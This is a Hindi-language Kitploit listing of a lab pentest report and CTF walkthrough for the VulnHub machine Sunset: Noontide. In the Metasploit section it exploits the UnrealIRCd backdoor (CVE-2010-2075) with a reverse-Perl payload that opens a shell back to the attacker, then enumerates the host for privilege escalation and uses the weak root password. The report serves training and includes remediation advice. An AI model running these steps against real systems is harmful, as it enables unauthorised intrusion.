Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sunset-noontide-pentesting — विवरण Sunset: Noontide VulnHub मशीन का पेशेवर पेनिट्रेशन टेस्टिंग मूल्यांकन, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, CVE-2010-2075 एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, और पूर्ण सिस्टम कॉम्प्रोमाइज़ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/zales2004/sunset-noontide-pentesting
विशेषाधिकार वृद्धिटोहीपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणपोस्ट-शोषणनेटवर्क सुरक्षाCTFपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
रेड टीमिंग
लैब और अभ्यास
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

विवरण Sunset: Noontide VulnHub मशीन का पेशेवर पेनिट्रेशन टेस्टिंग मूल्यांकन, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, CVE-2010-2075 एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, और पूर्ण सिस्टम कॉम्प्रोमाइज़ शामिल हैं।

रिपॉजिटरी देखें
9घं 7मि पहलेअभी तक समीक्षित नहीं

Sunset: Noontide — पेनेट्रेशन टेस्टिंग

Sunset: Noontide का एक पेशेवर पेनेट्रेशन टेस्टिंग मूल्यांकन और CTF वॉकथ्रू, जो VulnHub की एक जानबूझकर कमजोर बनाई गई मशीन है।

यह प्रोजेक्ट पूर्ण पेनेट्रेशन टेस्टिंग जीवनचक्र का दस्तावेजीकरण करता है, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, वल्नरेबिलिटी रिसर्च, एक्सप्लॉइटेशन, प्रारंभिक एक्सेस, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, प्रूफ-ऑफ-कॉम्प्रोमाइज़, जोखिम मूल्यांकन, MITRE ATT&CK मैपिंग, और उपचार शामिल हैं।

⚠️ अस्वीकरण: यह मूल्यांकन एक अधिकृत प्रयोगशाला वातावरण में जानबूझकर कमजोर बनाई गई मशीन के विरुद्ध किया गया था। यहाँ प्रलेखित तकनीकें और कमांड केवल उन सिस्टम के लिए हैं जिनके लिए स्पष्ट प्राधिकरण प्राप्त किया गया है।


🎯 उद्देश्य

  • लक्ष्य होस्ट की पहचान करना
  • उजागर सेवाओं की गणना करना
  • कमजोर सॉफ़्टवेयर और संस्करणों की पहचान करना
  • लागू होने वाली कमजोरियों पर शोध करना
  • कमजोर सेवा का शोषण करना
  • प्रारंभिक शेल एक्सेस प्राप्त करना
  • Linux पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन करना
  • प्रिविलेज एस्केलेशन के अवसरों की पहचान करना
  • रूट-स्तरीय एक्सेस प्राप्त करना
  • उपयोगकर्ता और रूट प्रूफ फ़ाइलें पुनर्प्राप्त करना
  • सुरक्षा निष्कर्षों का दस्तावेजीकरण करना
  • उपचार सिफारिशें प्रदान करना

🖥️ लैब वातावरण

घटकविवरण
लक्ष्यSunset: Noontide
प्लेटफ़ॉर्मVulnHub
लक्ष्य IP10.106.186.186
लक्ष्य होस्टनामnoontide
लक्ष्य OSDebian GNU/Linux 10 (Buster)
आर्किटेक्चरx86_64
हमलावर प्लेटफ़ॉर्मKali Linux
हमलावर IP10.106.186.204
मूल्यांकन प्रकारअधिकृत प्रयोगशाला मूल्यांकन
समग्र जोखिमCRITICAL
मूल्यांकन परिणामपूर्ण सिस्टम कॉम्प्रोमाइज़

🔐 अटैक चेन

लक्ष्य खोज → Nmap एन्यूमरेशन → UnrealIRCd 3.2.8.1 की पहचान → SearchSploit → CVE-2010-2075 की पहचान → Metasploit एक्सप्लॉइटेशन → रिमोट कमांड शेल → server के रूप में शेल → Linux पोस्ट-एक्सप्लॉइटेशन → कमजोर रूट क्रेडेंशियल → su root → UID 0 / रूट एक्सेस → उपयोगकर्ता और रूट प्रूफ फ़ाइलें


1. रेकॉनिसेंस

कमजोर लक्ष्य की पहचान करने के लिए प्रारंभिक नेटवर्क डिस्कवरी की गई।

लक्ष्य को अंततः इस रूप में पहचाना गया:

10.106.186.186

रेकॉनिसेंस के दौरान, 10.106.186.142 को इच्छित लक्ष्य के बजाय डिफ़ॉल्ट गेटवे के रूप में पहचाना गया।

यह आगे की सुरक्षा परीक्षण करने से पहले लक्ष्य की सही पहचान करने के महत्व को उजागर करता है, विशेष रूप से ब्रिज्ड या साझा प्रयोगशाला नेटवर्क में।


2. सर्विस एन्यूमरेशन

लक्ष्य के विरुद्ध Nmap सर्विस और संस्करण डिटेक्शन निम्नलिखित का उपयोग करके किया गया:

nmap -sV 10.106.186.186

मूल्यांकन के दौरान पहचानी गई महत्वपूर्ण उजागर सेवा थी:

6667/tcp open irc UnrealIRCd

इसके बाद अधिक विस्तृत स्कैन निम्नलिखित का उपयोग करके किया गया:

nmap -sC -sV -Pn -p 6667 10.106.186.186

सेवा की पहचान इस रूप में की गई:

UnrealIRCd 3.2.8.1

IRC सेवा ने यह भी रिपोर्ट किया:

irc.foonet.com

उजागर UnrealIRCd सेवा मूल्यांकन के दौरान जाँचा गया प्राथमिक अटैक सरफेस बन गई।


3. वल्नरेबिलिटी रिसर्च

खोजे गए UnrealIRCd संस्करण से जुड़ी सार्वजनिक रूप से प्रलेखित कमजोरियों की जाँच के लिए SearchSploit का उपयोग किया गया।

कमांड:

searchsploit UnrealIRCd 3.2.8.1

प्रासंगिक परिणाम था:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

कमजोरी की पहचान इस रूप में की गई:

CVE-2010-2075

कमजोरी

UnrealIRCd 3.2.8.1 बैकडोर कमांड एक्ज़ीक्यूशन

गंभीरता

Critical

हमले का प्रकार

रिमोट कमांड एक्ज़ीक्यूशन

सुरक्षा प्रभाव

कमजोर सेवा का सफल शोषण हमलावर को लक्ष्य सिस्टम पर दूर से कमांड निष्पादित करने की अनुमति देता है।


4. Metasploit एक्सप्लॉइटेशन

कमजोर IRC सेवा का शोषण Metasploit Framework का उपयोग करके किया गया।

चयनित मॉड्यूल था:

exploit/unix/irc/unreal_ircd_3281_backdoor

उदाहरण कॉन्फ़िगरेशन:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

प्रारंभिक पेलोड प्रयासों से कोई उपयोगी सत्र उत्पन्न नहीं हुआ।

इसके बाद एक संगत Unix रिवर्स-Perl पेलोड चुना गया:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit ने रिपोर्ट किया कि लक्ष्य कमजोर प्रतीत होता है और सफलतापूर्वक एक कमांड-शेल सत्र खोला।


5. प्रारंभिक एक्सेस

प्राप्त शेल को निम्नलिखित का उपयोग करके सत्यापित किया गया:

whoami

परिणाम:

server

इसने server खाते के रूप में सफल रिमोट कमांड निष्पादन की पुष्टि की।

प्रारंभिक कार्यशील निर्देशिका थी:

/home/server/irc/Unreal3.2

इस चरण में, मूल्यांकन रिमोट सेवा शोषण से स्थानीय पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन की ओर बढ़ा।


6. पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन

शेल प्राप्त करने के बाद, कॉम्प्रोमाइज़्ड होस्ट को समझने और संभावित प्रिविलेज एस्केलेशन पथों की पहचान करने के लिए मानक Linux एन्यूमरेशन किया गया।

वर्तमान उपयोगकर्ता

कमांड:

id

परिणाम:

uid=1000(server) gid=1000(server)

खाता एक गैर-रूट उपयोगकर्ता था।

होस्टनाम

कमांड:

hostname

परिणाम:

noontide

कर्नेल जानकारी

कमांड:

uname -a

परिणाम:

Linux noontide 4.19.0-10-amd64 x86_64

ऑपरेटिंग सिस्टम

कमांड:

cat /etc/os-release

परिणाम:

Debian GNU/Linux 10 (buster)

इन कमांडों ने वर्तमान पहचान, होस्टनाम, कर्नेल संस्करण, ऑपरेटिंग सिस्टम, और सामान्य सिस्टम कॉन्फ़िगरेशन को स्थापित किया।


7. प्रिविलेज एस्केलेशन एन्यूमरेशन

कई मानक Linux प्रिविलेज एस्केलेशन जाँचें की गईं।

7.1 SUID एन्यूमरेशन

कमांड:

find / -perm -4000 -type f 2>/dev/null

passwd, chsh, mount, umount, su, chfn, newgrp, और gpasswd जैसे मानक SUID बाइनरी की पहचान की गई।

सफल एस्केलेशन वेक्टर के रूप में कोई स्पष्ट कस्टम या असामान्य SUID बाइनरी की पहचान नहीं की गई।


7.2 Sudo एन्यूमरेशन

कमांड:

sudo -l

उपलब्ध आउटपुट से कोई उपयोगी sudo-आधारित प्रिविलेज एस्केलेशन पथ की पहचान नहीं की गई।


7.3 Cron एन्यूमरेशन

कमांड:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

देखे गए शेड्यूल किए गए जॉब मानक Debian-शैली के सिस्टम जॉब थे।

कोई स्पष्ट रूप से लिखने योग्य रूट cron जॉब की पहचान नहीं की गई।


7.4 राइटेबल फ़ाइल एन्यूमरेशन

कमांड:

find / -writable -type f 2>/dev/null | head -100

प्रारंभिक परिणाम मुख्य रूप से /proc स्यूडो-फ़ाइलें थीं और किसी व्यावहारिक प्रिविलेज एस्केलेशन वेक्टर का खुलासा नहीं किया।


7.5 Linux क्षमताएँ

कमांड:

getcap -r / 2>/dev/null

परिणामी आउटपुट से कोई उपयोगी क्षमता-आधारित प्रिविलेज एस्केलेशन की पहचान नहीं की गई।


8. प्रिविलेज एस्केलेशन

सफल प्रिविलेज एस्केलेशन पथ कमजोर मशीन पर कॉन्फ़िगर किए गए जानबूझकर कमजोर रूट क्रेडेंशियल पर आधारित था।

रूट खाते का उपयोग निम्नलिखित का उपयोग करके किया गया:

su root

पासवर्ड:

root

इसके बाद रूट एक्सेस को निम्नलिखित का उपयोग करके सत्यापित किया गया:

id

परिणाम:

uid=0(root) gid=0(root) groups=0(root)

पहचान की पुष्टि निम्नलिखित का उपयोग करके भी की गई:

whoami

परिणाम:

root

इसने लक्ष्य सिस्टम के पूर्ण प्रशासनिक नियंत्रण की पुष्टि की।


9. प्रूफ ऑफ कॉम्प्रोमाइज़

9.1 उपयोगकर्ता-स्तरीय प्रूफ

उपयोगकर्ता-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:

/home/server/local.txt

कमांड:

cat /home/server/local.txt

परिणाम:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 रूट-स्तरीय प्रूफ

रूट-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:

/root/proof.txt

कमांड:

cat /root/proof.txt

परिणाम:

ab28c8ca8da1b9ffc2d702ac54221105

रूट प्रूफ ने यह भी लौटाया:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

दोनों प्रूफ फ़ाइलों की पुनर्प्राप्ति प्रारंभिक रिमोट एक्सेस से रूट-स्तरीय नियंत्रण तक सफल कॉम्प्रोमाइज़ की पुष्टि करती है।


10. जोखिम सारांश

IDनिष्कर्षगंभीरताप्रभाव
VULN-01UnrealIRCd 3.2.8.1 बैकडोर🔴 Criticalरिमोट कमांड एक्ज़ीक्यूशन
VULN-02कमजोर रूट क्रेडेंशियल🔴 Criticalपूर्ण प्रशासनिक कॉम्प्रोमाइज़

11. विस्तृत निष्कर्ष

VULN-01 — UnrealIRCd 3.2.8.1 बैकडोर

गंभीरता: Critical

प्रभावित सेवा: IRC / TCP 6667

प्रभावित सॉफ़्टवेयर: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

हमले का प्रकार: रिमोट कमांड एक्ज़ीक्यूशन

देखा गया प्रभाव: server के रूप में रिमोट शेल प्राप्त

विवरण

उजागर UnrealIRCd सेवा एक ज्ञात बैकडोर कमांड-एक्ज़ीक्यूशन कमजोरी से जुड़ा एक कमजोर संस्करण चला रही थी।

कमजोरी की पहचान सर्विस एन्यूमरेशन और SearchSploit रिसर्च के माध्यम से की गई और Metasploit का उपयोग करके सफलतापूर्वक शोषण किया गया।

व्यावसायिक प्रभाव

कमजोर IRC सेवा तक पहुँचने में सक्षम हमलावर दूर से कमांड निष्पादित कर सकता है और होस्ट तक अनधिकृत पहुँच प्राप्त कर सकता है।


VULN-02 — कमजोर रूट क्रेडेंशियल

गंभीरता: Critical

प्रभावित खाता: root

देखा गया क्रेडेंशियल: root / root

देखा गया प्रभाव: UID 0 प्रशासनिक पहुँच

विवरण

रूट खाता अत्यंत कमजोर क्रेडेंशियल के साथ कॉन्फ़िगर किया गया था।

server के रूप में स्थानीय शेल प्राप्त करने के बाद, कमजोर क्रेडेंशियल का उपयोग करके रूट खाते तक पहुँचा गया और UID 0 के साथ सत्यापित किया गया।

व्यावसायिक प्रभाव

स्थानीय शेल एक्सेस प्राप्त करने वाला हमलावर ऑपरेटिंग सिस्टम का पूर्ण नियंत्रण प्राप्त करने के लिए कमजोर रूट क्रेडेंशियल का उपयोग कर सकता है।


12. MITRE ATT&CK मैपिंग


13. उपचार सिफारिशें

13.1 UnrealIRCd को हटाएँ या अपग्रेड करें

कमजोर UnrealIRCd इंस्टॉलेशन को एक विश्वसनीय और समर्थित रिलीज़ से बदलें।

तैनाती से पहले सॉफ़्टवेयर की अखंडता और पैकेज की उत्पत्ति सत्यापित करें।

13.2 बैकडोर वाले सॉफ़्टवेयर को हटाएँ

यदि सॉफ़्टवेयर की अखंडता या उत्पत्ति अनिश्चित है, तो विश्वसनीय इंस्टॉलेशन मीडिया और सत्यापित पैकेजों का उपयोग करके सिस्टम को पुनर्निर्मित करें।

13.3 कमजोर क्रेडेंशियल को समाप्त करें

डिफ़ॉल्ट और कमजोर क्रेडेंशियल को मजबूत, अद्वितीय प्रशासनिक क्रेडेंशियल से बदलें।

root जैसे सरल पासवर्ड का उपयोग न करें।

13.4 IRC एक्सपोज़र को प्रतिबंधित करें

यदि IRC आवश्यक है, तो निम्नलिखित का उपयोग करके पहुँच प्रतिबंधित करें:

  • फ़ायरवॉल नियम
  • नेटवर्क सेगमेंटेशन
  • VPN एक्सेस
  • स्रोत-IP प्रतिबंध

13.5 सुरक्षा अपडेट लागू करें

ऑपरेटिंग सिस्टम और सभी उजागर सेवाओं के लिए एक प्रलेखित पैच-प्रबंधन प्रक्रिया बनाए रखें।

13.6 विशेषाधिकार प्राप्त पहुँच की निगरानी करें

लॉग और समीक्षा करें:

  • प्रशासनिक प्रमाणीकरण
  • रूट एक्सेस
  • विशेषाधिकार परिवर्तन
  • संदिग्ध प्रमाणीकरण गतिविधि

14. पेनेट्रेशन टेस्टिंग कार्यप्रणाली


15. उपयोग किए गए उपकरण

  • Nmap — नेटवर्क डिस्कवरी और सर्विस एन्यूमरेशन
  • SearchSploit — कमजोरी और एक्सप्लॉइट रिसर्च
  • Metasploit Framework — एक्सप्लॉइटेशन और सत्र स्थापना
  • Linux कमांड-लाइन यूटिलिटीज़ — पोस्ट-एक्सप्लॉइटेशन और विशेषाधिकार एन्यूमरेशन

16. प्रदर्शित कौशल

  • नेटवर्क रेकॉनिसेंस
  • होस्ट डिस्कवरी
  • पोर्ट स्कैनिंग
  • सर्विस एन्यूमरेशन
  • संस्करण पहचान
  • वल्नरेबिलिटी मूल्यांकन
  • CVE रिसर्च
  • SearchSploit
  • Metasploit Framework
  • रिमोट कमांड एक्ज़ीक्यूशन
  • Linux एन्यूमरेशन
  • SUID एन्यूमरेशन
  • Sudo एन्यूमरेशन
  • Cron एन्यूमरेशन
  • राइटेबल फ़ाइल एन्यूमरेशन
  • Linux क्षमताएँ
  • क्रेडेंशियल सुरक्षा मूल्यांकन
  • प्रिविलेज एस्केलेशन
  • प्रूफ-ऑफ-कॉम्प्रोमाइज़
  • MITRE ATT&CK मैपिंग
  • जोखिम मूल्यांकन
  • सुरक्षा रिपोर्टिंग
  • उपचार विश्लेषण

17. अंतिम मूल्यांकन

Sunset: Noontide होस्ट को प्रारंभिक नेटवर्क एक्सेस से पूर्ण रूट-स्तरीय नियंत्रण तक सफलतापूर्वक कॉम्प्रोमाइज़ किया गया।

प्राथमिक प्रारंभिक-एक्सेस कमजोरी UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) थी।

कमजोरी ने रिमोट कमांड एक्ज़ीक्यूशन प्रदान किया और परिणामस्वरूप server खाते के रूप में प्रारंभिक शेल प्राप्त हुआ।

इसके बाद पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन किया गया, जिसमें SUID, sudo, cron, राइटेबल-फ़ाइल, Linux क्षमता, पहचान, ऑपरेटिंग-सिस्टम, और फ़ाइलसिस्टम जाँचें शामिल थीं।

इन जाँचों ने सफल एस्केलेशन मार्ग की पहचान नहीं की।

पूर्ण प्रशासनिक पहुँच अंततः मशीन के कमजोर रूट क्रेडेंशियल के माध्यम से प्राप्त की गई।

उपयोगकर्ता-स्तरीय और रूट-स्तरीय दोनों प्रूफ फ़ाइलों की सफल पुनर्प्राप्ति ने पूर्ण सिस्टम कॉम्प्रोमाइज़ की पुष्टि की।

समग्र मूल्यांकन

CRITICAL — पूर्ण सिस्टम कॉम्प्रोमाइज़ प्राप्त


18. मूल्यांकन परिणाम


19. पेशेवर पेनेट्रेशन टेस्टिंग रिपोर्ट

इस प्रोजेक्ट के साथ एक विस्तृत पेशेवर पेनेट्रेशन टेस्टिंग रिपोर्ट शामिल है:

Sunset-Noontide-Penetration-Testing-Report.pdf

रिपोर्ट में शामिल हैं:

  • कार्यकारी सारांश
  • दस्तावेज़ नियंत्रण
  • दायरा और एंगेजमेंट के नियम
  • जोखिम सारांश
  • अटैक पथ
  • रेकॉनिसेंस
  • सर्विस एन्यूमरेशन
  • वल्नरेबिलिटी रिसर्च
  • Metasploit एक्सप्लॉइटेशन
  • प्रारंभिक एक्सेस
  • पोस्ट-एक्सप्लॉइटेशन
  • प्रिविलेज एस्केलेशन
  • साक्ष्य और प्रूफ फ़ाइलें
  • विस्तृत निष्कर्ष
  • MITRE ATT&CK मैपिंग
  • उपचार सिफारिशें
  • अंतिम मूल्यांकन

20. साक्ष्य

सुझावित रिपॉज़िटरी संरचना:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

स्क्रीनशॉट में केवल अधिकृत प्रयोगशाला वातावरण की जानकारी होनी चाहिए।


21. सीखे गए सबक

इस मूल्यांकन ने निम्नलिखित में व्यावहारिक अनुभव प्रदान किया:

  1. नेटवर्क वातावरण में इच्छित लक्ष्य की सही पहचान करना।
  2. Nmap के साथ सर्विस और संस्करण एन्यूमरेशन करना।
  3. SearchSploit का उपयोग करके कमजोरियों पर शोध करना।
  4. उपयुक्त Metasploit एक्सप्लॉइट मॉड्यूल का चयन करना।
  5. पेलोड संगतता का समस्या-निवारण करना।
  6. रिमोट कमांड शेल स्थापित करना।
  7. Linux पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन करना।
  8. सामान्य प्रिविलेज एस्केलेशन वेक्टरों की व्यवस्थित रूप से जाँच करना।
  9. कमजोर प्रशासनिक क्रेडेंशियल की पहचान करना।
  10. रूट-स्तरीय कॉम्प्रोमाइज़ को सत्यापित करना।
  11. प्रूफ-ऑफ-कॉम्प्रोमाइज़ साक्ष्य एकत्र करना।
  12. पेशेवर पेनेट्रेशन टेस्टिंग प्रारूप में कमजोरियों का दस्तावेजीकरण करना।

22. ⚠️ कानूनी और नैतिक अस्वीकरण

यह रिपॉज़िटरी सख्ती से निम्नलिखित के लिए है:

  • साइबर सुरक्षा शिक्षा
  • अधिकृत पेनेट्रेशन ट
टूल डाउनलोड करें
तकनीकIDदेखी गई गतिविधि
नेटवर्क सर्विस स्कैनिंगT1046Nmap एन्यूमरेशन
एक्सपोज़्ड पब्लिक-फेसिंग एप्लिकेशन का शोषणT1190उजागर UnrealIRCd सेवा का शोषण
कमांड और स्क्रिप्टिंग इंटरप्रेटरT1059रिमोट कमांड शेल
वैध खातेT1078रूट क्रेडेंशियल का उपयोग
खाता खोजT1087पहचान और उपयोगकर्ता एन्यूमरेशन
सिस्टम सूचना खोजT1082uname और /etc/os-release
फ़ाइल और निर्देशिका खोजT1083फ़ाइलसिस्टम एन्यूमरेशन
शेड्यूल्ड टास्क/जॉब खोजT1053Cron एन्यूमरेशन
अनुमति समूह खोजT1069id और समूह एन्यूमरेशन
चरणगतिविधियाँ
रेकॉनिसेंसनेटवर्क डिस्कवरी और लक्ष्य पहचान
एन्यूमरेशनNmap सर्विस/संस्करण डिटेक्शन
वल्नरेबिलिटी रिसर्चSearchSploit और Metasploit मॉड्यूल पहचान
एक्सप्लॉइटेशनUnrealIRCd बैकडोर का शोषण
प्रारंभिक एक्सेसserver के रूप में कमांड शेल
पोस्ट-एक्सप्लॉइटेशनपहचान, OS, फ़ाइलसिस्टम और विशेषाधिकार एन्यूमरेशन
प्रिविलेज एस्केलेशनSUID, sudo, cron, राइटेबल-फ़ाइल और क्षमता जाँच
साक्ष्य संग्रहउपयोगकर्ता और रूट प्रूफ फ़ाइलें
रिपोर्टिंगनिष्कर्ष, जोखिम विश्लेषण और उपचार
उद्देश्यस्थिति
लक्ष्य की पहचान✅ PASS
उजागर सेवा की पहचान✅ PASS
कमजोर संस्करण की पहचान✅ PASS
CVE की पहचान✅ PASS
रिमोट कमांड एक्ज़ीक्यूशन✅ PASS
server के रूप में प्रारंभिक शेल✅ PASS
उपयोगकर्ता प्रूफ पुनर्प्राप्त✅ PASS
प्रिविलेज एस्केलेशन✅ PASS
रूट एक्सेस सत्यापित✅ PASS
रूट प्रूफ पुनर्प्राप्त✅ PASS